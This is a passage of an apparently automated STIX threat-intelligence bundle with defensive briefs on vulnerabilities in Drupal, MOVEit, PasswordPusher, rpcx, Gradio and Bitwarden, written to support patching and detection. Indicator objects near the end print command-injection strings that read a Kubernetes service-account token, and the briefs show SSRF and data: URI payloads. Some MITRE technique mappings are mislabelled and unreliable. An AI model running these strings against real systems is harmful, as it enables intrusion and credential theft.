the attacker to bypass authentication, query arbitrary tables, or manipulate database content.\n5. The attacker uses this access to extract sensitive information, such as user credentials, session tokens, or proprietary organizational data.\n6. The stolen data is then exfiltrated by the attacker, often embedded within the legitimate HTTP responses or through direct database connections established via the injection.\n\n## Impact\n\nSuccessful exploitation of this critical SQL Injection vulnerability in the Drupal Location Selector module could lead to severe consequences for affected organizations. Attackers could gain unauthorized access to an organization's entire database, including sensitive customer data, proprietary business information, or user credentials. This compromise can result in significant data breaches, reputational damage, financial losses due to regulatory penalties, and potential operational disruption. Depending on the database configuration, SQL injection could also lead to remote code execution (RCE) on the underlying server, further escalating the impact to full system compromise. While no specific victim count or targeted sectors were mentioned, any organization using the vulnerable module is at risk.\n\n## Recommendation\n\n* Apply the update for Drupal Location Selector module to version 1.3.0 or later immediately, as advised in the CCCS advisory AV26-676 and Drupal SA-CONTRIB-2026-072.\n* Deploy the Sigma rule in this brief to your SIEM to detect potential SQL Injection attempts against your web applications.\n* Review web server access logs for anomalous requests containing common SQL injection patterns, especially targeting any Drupal Location Selector module endpoints.\n* Enable robust logging for web servers, including full request URLs, query strings, and POST data, to assist in detecting and investigating web-based attacks.\n",
      "published": "2026-07-08T19:04:10Z",
      "labels": [
        "sql-injection",
        "web-application",
        "drupal"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://cyber.gc.ca/en/alerts-advisories/drupal-security-advisory-av26-676"
        },
        {
          "source_name": "reference",
          "url": "https://www.drupal.org/sa-contrib-2026-072"
        },
        {
          "source_name": "reference",
          "url": "https://www.drupal.org/security"
        }
      ],
      "confidence": 95
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--944a88a3-7c4a-59ea-95a7-eff8925abbea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Progress MOVEit Transfer Critical Security Advisory (AV26-678)",
      "description": "## Overview\n\nOn July 8, 2026, the Canadian Centre for Cyber Security (CCCS) issued an alert, AV26-678, referencing a critical security bulletin from Progress Software. This advisory addresses multiple severe vulnerabilities (CVE-2026-10699, CVE-2026-10698, CVE-2026-11903) impacting MOVEit Transfer, a widely used managed file transfer solution. Affected versions include 2024.1.8 and prior, 2025.0.0 to 2025.0.7, 2025.1.0 to 2025.1.3, and 2026.0.0. While specific exploitation details are not provided in the advisory, critical vulnerabilities in such systems typically pose a significant risk of unauthorized access, data exfiltration, or remote code execution, making immediate patching crucial for all organizations utilizing MOVEit Transfer.\n\n## Attack Chain\n\nThe provided security advisories (AV26-678, CVE-2026-10699, CVE-2026-10698, CVE-2026-11903) from Progress Software and the CCCS do not detail specific exploitation methods or a step-by-step attack chain for these vulnerabilities. However, unpatched critical vulnerabilities in managed file transfer solutions can broadly lead to the following outcomes:\n\n1. **Vulnerability Identification:** An attacker identifies an unpatched MOVEit Transfer instance on an internet-facing network.\n2. **Initial Access:** The attacker exploits one of the identified critical vulnerabilities (e.g., CVE-2026-10699, CVE-2026-10698, CVE-2026-11903) to gain unauthorized access to the MOVEit Transfer server. This could involve bypassing authentication, injecting malicious code, or leveraging flaws in file processing.\n3. **Command Execution / Data Access:** Upon successful exploitation, the attacker gains the ability to execute arbitrary commands on the underlying server or access sensitive files stored within the MOVEit Transfer environment.\n4. **Data Exfiltration:** Malicious actors may then search for and exfiltrate sensitive data, such as customer records, financial information, or intellectual property, to attacker-controlled infrastructure.\n5. **Persistence (Optional):** The attacker might establish persistence mechanisms on the compromised server to maintain access even if initial vulnerabilities are patched later.\n6. **Impact:** The final objective is typically data theft, disruption of services, or further lateral movement into the victim's network.\n\n## Impact\n\nThe impact of unpatched critical vulnerabilities in MOVEit Transfer is severe, as the product is designed to handle and transfer sensitive data for organizations across various sectors. Successful exploitation could lead to unauthorized access to an organization's most critical data, resulting in massive data breaches, significant financial losses due and regulatory fines, reputational damage, and operational disruption. While the current advisory does not provide victim counts or specific sectors targeted, past incidents involving MOVEit Transfer vulnerabilities have affected hundreds of organizations globally, including government agencies, financial institutions, and healthcare providers, underscoring the widespread potential for devastating consequences.\n\n## Recommendation\n\n* Immediately review the Progress Security Bulletin linked in this brief and apply the necessary updates to all affected MOVEit Transfer instances to address CVE-2026-10699, CVE-2026-10698, and CVE-2026-11903.\n* Validate that all MOVEit Transfer versions listed in the advisory are updated to their respective patched versions.\n* Consult the CCCS advisory (AV26-678) for additional guidance and stay informed on subsequent updates from Progress Software.\n",
      "published": "2026-07-08T20:05:52Z",
      "labels": [
        "vulnerability",
        "cve",
        "data-exfiltration",
        "critical-vulnerability",
        "moveit"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://cyber.gc.ca/en/alerts-advisories/progress-security-advisory-av26-678"
        },
        {
          "source_name": "reference",
          "url": "https://community.progress.com/s/article/MOVEit-Transfer-Critical-Security-Bulletin-June-2026"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cefeb764-0cdc-5191-b034-deba99545c56",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9e93edf2-4b88-5b4c-be87-a453f453c9ee",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--397d4a44-5039-5abd-acfa-e90d3479e378",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9e93edf2-4b88-5b4c-be87-a453f453c9ee",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1538",
          "url": "https://attack.mitre.org/techniques/T1538"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--72ca8ee4-2fd0-5172-a283-e36025c27be5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9e93edf2-4b88-5b4c-be87-a453f453c9ee",
      "target_ref": "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9e93edf2-4b88-5b4c-be87-a453f453c9ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59802 - PasswordPusher Data URI Scheme Vulnerability Leading to Client-Side JavaScript Execution",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-59802, has been identified in PasswordPusher versions prior to 2.8.1. This flaw stems from insufficient validation within the application's `valid_url` function, which incorrectly permits `data:` URI schemes in URL push payloads. Attackers can leverage this by crafting malicious pushes containing `data:text/html` URIs that, when clicked by a victim, execute arbitrary JavaScript code within their web browser. This client-side execution occurs under the trusted PasswordPusher domain, creating a highly effective vector for sophisticated phishing attacks, credential theft, and potential session hijacking. The vulnerability poses a significant risk to user data integrity and confidentiality, emphasizing the need for immediate patching for all affected deployments.\n\n## Attack Chain\n\n1. Attacker crafts a malicious URL payload utilizing the `data:` URI scheme (e.g., `data:text/html,\u003cscript\u003emalicious_javascript_code_here\u003c/script\u003e`).\n2. Attacker creates a PasswordPusher \"push\" (message or URL entry) and embeds the malicious `data:` URI into it.\n3. The attacker delivers this crafted malicious push to a target victim through legitimate PasswordPusher functionality.\n4. The victim accesses the received push message within the PasswordPusher application's web interface.\n5. The victim, perceiving a legitimate link from a trusted source, clicks on the displayed malicious `data:` URI.\n6. Due to the insufficient validation in PasswordPusher's `valid_url` function (CVE-2026-59802), the application fails to properly sanitize or block the `data:` URI.\n7. The victim's web browser then navigates to the `data:` URI, and the embedded arbitrary JavaScript executes within the security context of the PasswordPusher domain.\n8. The executed JavaScript proceeds to perform malicious actions such as displaying deceptive login forms (phishing), capturing user input, or exfiltrating session cookies and other sensitive information, leading to credential theft.\n\n## Impact\n\nThe successful exploitation of CVE-2026-59802 could lead to significant data breaches and financial losses for individual users and organizations relying on PasswordPusher. Victims are susceptible to sophisticated phishing attacks where their credentials (passwords, tokens) are stolen due to JavaScript executing in a trusted domain context. This bypasses standard phishing defenses and can result in unauthorized access to other systems. The integrity of shared secrets is compromised, leading to a cascade of potential security incidents across an organization. While specific victim counts are not yet reported, any user interacting with a vulnerable PasswordPusher instance is at risk.\n\n## Recommendation\n\n* Upgrade PasswordPusher to version 2.8.1 or later immediately to address CVE-2026-59802.\n* Educate users about the dangers of clicking unfamiliar links, especially those using `data:` URI schemes, even if they appear within a trusted application interface.\n",
      "published": "2026-07-08T20:18:02Z",
      "labels": [
        "vulnerability",
        "web-application",
        "client-side",
        "javascript",
        "credential-theft",
        "phishing"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59802"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Resource Exhaustion",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f86cd97-6fb0-58f7-a2d0-27fc635ff584",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb013375-62b6-54fb-a692-c2a76f55af37",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bb013375-62b6-54fb-a692-c2a76f55af37",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59803: rpcx Denial-of-Service Vulnerability",
      "description": "## Overview\n\nA critical denial-of-service (DoS) vulnerability, tracked as CVE-2026-59803, exists in the popular rpcx Go RPC framework, affecting all versions up to 1.9.3. This vulnerability stems from improper handling of compressed messages within the `protocol.Message.Decode` function in `protocol/message.go`. An unauthenticated attacker can exploit this by sending a specially crafted, small (under 2 MB) gzip-compressed message. The `util.Unzip` function, used for decompression, lacks size limits on its output, allowing the small input to expand into gigabytes of memory allocation. The existing `protocol.MaxMessageLength` guard is ineffective as it only checks the compressed frame length, not the expanded decompressed size. This \"decompression bomb\" leads to out-of-memory conditions, causing the rpcx service to crash and become unavailable.\n\n## Attack Chain\n\n1. An unauthenticated attacker establishes a connection to a vulnerable rpcx service.\n2. The attacker crafts a malicious rpcx message with the compression flag set.\n3. The payload of this message consists of a small (under 2 MB) gzip-compressed data stream engineered to expand exponentially upon decompression.\n4. The attacker sends this crafted message over the established connection to the rpcx service.\n5. The rpcx service's `readRequest` function receives the message prior to any authentication checks.\n6. The `protocol.Message.Decode` function is invoked to process the message, which subsequently calls `util.Unzip` to decompress the payload.\n7. During the decompression process, the maliciously crafted payload expands to consume gigabytes of the service's memory.\n8. The service encounters an out-of-memory (OOM) condition, leading to its crash and resulting in a denial of service.\n\n## Impact\n\nThe primary impact of CVE-2026-59803 is the complete denial of service for affected rpcx applications. Exploitation is unauthenticated, meaning any external attacker can crash vulnerable services, rendering them unavailable to legitimate users. This can lead to significant operational disruption, data unavailability, and potential financial losses for organizations relying on rpcx for their services. While no specific victim count or targeted sectors are available, any organization deploying rpcx services through version 1.9.3 is at risk of this easily triggered DoS.\n\n## Recommendation\n\n* Patch CVE-2026-59803 immediately by upgrading rpcx to a patched version (1.9.4 or later) or applying commit 047aec1.\n* Monitor your rpcx application hosts for sudden spikes in memory usage or unexpected service restarts, which could indicate attempted exploitation of CVE-2026-59803.\n",
      "published": "2026-07-08T20:18:47Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "rpcx",
        "go-lang"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59803"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0607141-caed-5343-b43f-9758469b6a64",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7a91a1b4-41fa-5447-905b-92eea3b1490f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--822c8b39-f64e-5c4e-9b3f-09dfb4763a74",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7a91a1b4-41fa-5447-905b-92eea3b1490f",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7a91a1b4-41fa-5447-905b-92eea3b1490f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gradio Open Redirect and Server-Side Request Forgery (SSRF) Vulnerability (CVE-2026-59806)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-59806, affects Gradio installations prior to version 6.20.0, exposing them to both open redirect and server-side request forgery (SSRF) attacks. This flaw resides within the `file_fetch()` function, accessible via the `/gradio_api/file=` endpoint, which fails to properly validate user-supplied HTTP/HTTPS URLs. Threat actors can leverage this vulnerability to craft malicious requests that either redirect users to arbitrary external websites or compel the Gradio server to make requests to internal network resources. The most severe consequence of the SSRF aspect is the potential to target cloud metadata services, such as AWS EC2 instance metadata, enabling attackers to retrieve highly sensitive credentials like IAM role access keys. This access can then be used to escalate privileges, exfiltrate data, or deploy further malicious infrastructure within compromised cloud environments.\n\n## Attack Chain\n\n1. The attacker identifies a Gradio application running a version prior to 6.20.0, potentially through automated scanning or reconnaissance.\n2. The attacker crafts a malicious HTTP GET or POST request targeting the `/gradio_api/file=` endpoint of the vulnerable Gradio application.\n3. Within the request, the attacker includes a specially crafted `FileData` parameter containing an unvalidated HTTP or HTTPS URL as input to the `file_fetch()` function.\n4. For an open redirect attack, the attacker supplies an arbitrary external URL (e.g., `https://malicious-site.com/phish`).\n5. For an SSRF attack, the attacker supplies an internal endpoint URL (e.g., `http://169.254.169.254/latest/meta-data/iam/security-credentials/`) to access cloud metadata services.\n6. The vulnerable Gradio server processes the request, internally making an HTTP request to the attacker-supplied URL without sufficient validation.\n7. If the SSRF is successful against a cloud metadata service, the server retrieves sensitive data, such as EC2 IAM role credentials.\n8. The Gradio server then returns the response containing the sensitive credentials or redirection instruction to the attacker through the original `FileData` response, achieving credential theft or user redirection.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-59806 can lead to significant compromise. In the case of an open redirect, users interacting with the Gradio application can be involuntarily redirected to malicious phishing sites, leading to credential harvesting or malware downloads. More critically, the SSRF capability allows attackers to bypass network segmentation and access internal services that are not directly exposed to the internet. This includes highly sensitive cloud metadata APIs (e.g., AWS EC2), which can yield temporary IAM credentials. Compromise of these credentials enables attackers to assume roles, gain access to cloud resources, exfiltrate data from cloud storage, modify cloud configurations, or launch further attacks within the cloud environment. The overall risk is a complete takeover of cloud instances and associated data.\n\n## Recommendation\n\n* Patch Gradio to version 6.20.0 or later immediately to remediate CVE-2026-59806 as specified in the references.\n* Implement web application firewall (WAF) rules to detect and block suspicious requests to the `/gradio_api/file=` endpoint containing known cloud metadata service IP addresses or internal network ranges in URL parameters.\n* Deploy the Sigma rule below to your SIEM solution to detect attempts to exploit CVE-2026-59806 via SSRF by monitoring webserver logs.\n* Review network segmentation and apply strict egress filtering to prevent Gradio applications from initiating connections to internal cloud metadata services or other sensitive internal IP ranges.\n",
      "published": "2026-07-08T20:19:41Z",
      "labels": [
        "web-vulnerability",
        "ssrf",
        "open-redirect",
        "credential-access",
        "cloud",
        "gradio"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59806"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/gradio-app/gradio/commit/1c5c53842df9c2750552d85c19a92e7e732cff3f"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/gradio-app/gradio/issues/13593"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/gradio-app/gradio/pull/13596"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/gradio-app/gradio/releases/tag/gradio%406.20.0"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/gradio-open-redirect-and-ssrf-via-gradio-api-file-endpoint"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanisms",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea87fd09-0df4-5fd4-88af-47fa155620c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8bd3d4e7-4813-531a-a514-1466f6b6e0ee",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8257114a-bea2-5eab-9ead-9bc2a5ab5e14",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8bd3d4e7-4813-531a-a514-1466f6b6e0ee",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--55694b71-e1dd-597c-ac63-57747b2b9961",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8bd3d4e7-4813-531a-a514-1466f6b6e0ee",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Defacement",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad731376-ef41-51f6-a201-7220169ae6a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8bd3d4e7-4813-531a-a514-1466f6b6e0ee",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e64c1c88-9354-5027-aebe-e6d4ffba785b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8bd3d4e7-4813-531a-a514-1466f6b6e0ee",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--634fd653-6858-511f-bb37-71f3fe489131",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8bd3d4e7-4813-531a-a514-1466f6b6e0ee",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8bd3d4e7-4813-531a-a514-1466f6b6e0ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-60104 - Bitwarden Server Vault Key Disclosure and Account Takeover",
      "description": "## Overview\n\nCVE-2026-60104 impacts Bitwarden Server versions prior to 2026.6.0, presenting a critical vulnerability that allows low-privileged organization members to compromise other users' accounts. The flaw exists because the server fails to verify the email address provided in a `POST /auth-requests/admin-request` body belongs to the authenticated caller. An attacker can leverage this oversight to initiate a Trusted Device Encryption authentication request for a victim, binding it to a public key controlled by the attacker. Once this request is approved by the victim, the authentication details, including the victim's vault key and a victim-scoped access token, become readable from an unauthenticated endpoint. This ultimately leads to the disclosure of sensitive credentials and allows for a complete account takeover of the targeted user. This vulnerability highlights the importance of rigorous identity verification in API endpoints.\n\n## Attack Chain\n\n1. A low-privileged organization member, acting as an attacker, authenticates to the Bitwarden server.\n2. The attacker sends a `POST` request to the `/auth-requests/admin-request` API endpoint.\n3. The request body of this `POST` call contains the victim's email address and an attacker-controlled public key, intended to initiate a Trusted Device Encryption authentication request for the victim.\n4. The Bitwarden Server, vulnerable to CVE-2026-60104, processes this request without verifying that the email in the request body belongs to the authenticated caller.\n5. The victim receives and approves the fraudulent Trusted Device Encryption authentication request initiated by the attacker.\n6. Upon approval, the authentication request details, including the victim's vault key and a victim-scoped access token, become accessible from an unauthenticated endpoint.\n7. The attacker retrieves the victim's vault key and access token from the publicly accessible endpoint.\n8. Using the stolen vault key and access token, the attacker performs an account takeover of the victim's Bitwarden account.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-60104 results in the complete compromise of a targeted Bitwarden user's account. This includes the disclosure of the victim's highly sensitive vault key, which grants access to all stored passwords and secure notes. Additionally, an access token is compromised, allowing an attacker to impersonate the victim within the Bitwarden ecosystem. The impact is significant for any organization utilizing Bitwarden Server versions prior to 2026.6.0, as any low-privileged organization member could theoretically target higher-privileged users or other members, leading to widespread credential exposure and unauthorized access to critical corporate data.\n\n## Recommendation\n\n* Immediately upgrade Bitwarden Server to version 2026.6.0 or later to patch CVE-2026-60104.\n* Review all API endpoint configurations, especially those handling authentication and credential management, to ensure robust identity verification.\n",
      "published": "2026-07-08T20:20:43Z",
      "labels": [
        "vulnerability",
        "cve",
        "account-takeover",
        "credential-access",
        "data-disclosure",
        "bitwarden"
      ],
      "object_refs": [
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-60104"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b12f4a2b-d7c1-5123-bc57-2474668b06c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "attack_string: X-Inject\"; echo \"===RCE_CONFIRMED===\"; id; cat /var/run/secrets/kubernetes.io/serviceaccount/token | head -c 50; echo \"",
      "pattern": "[x-ti-bot:attack_string = 'X-Inject\"; echo \"===RCE_CONFIRMED===\"; id; cat /var/run/secrets/kubernetes.io/serviceaccount/token | head -c 50; echo \"']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T20:26:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e7ede96-4445-5fe0-9b34-b1761bf7d298",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--549a4db5-bae7-52e1-82c9-f6bb1a72986a",
      "target_ref": "indicator--b12f4a2b-d7c1-5123-bc57-2474668b06c3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cebc0025-c2b2-5d97-8dcb-7f912f7b2a6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "attack_string: $(id 1\u003e\u00262; echo BODY_INJECTION_PROOF)",
      "pattern": "[x-ti-bot:attack_string = '$(id 1\u003e\u00262; echo BODY_INJECTION_PROOF)']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T20:26:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f48d70e3-2abe-5d78-8b62-c79d09229a84",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--549a4db5-bae7-52e1-82c9-f6bb1a72986a",
      "target_ref": "indicator--cebc0025-c2b2-5d97-8dcb-7f912f7b2a6a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28ecc45f-d491-50a2-81d4-e56deb6353cd",
      "created": "2026-07-09T17:20:22Z",
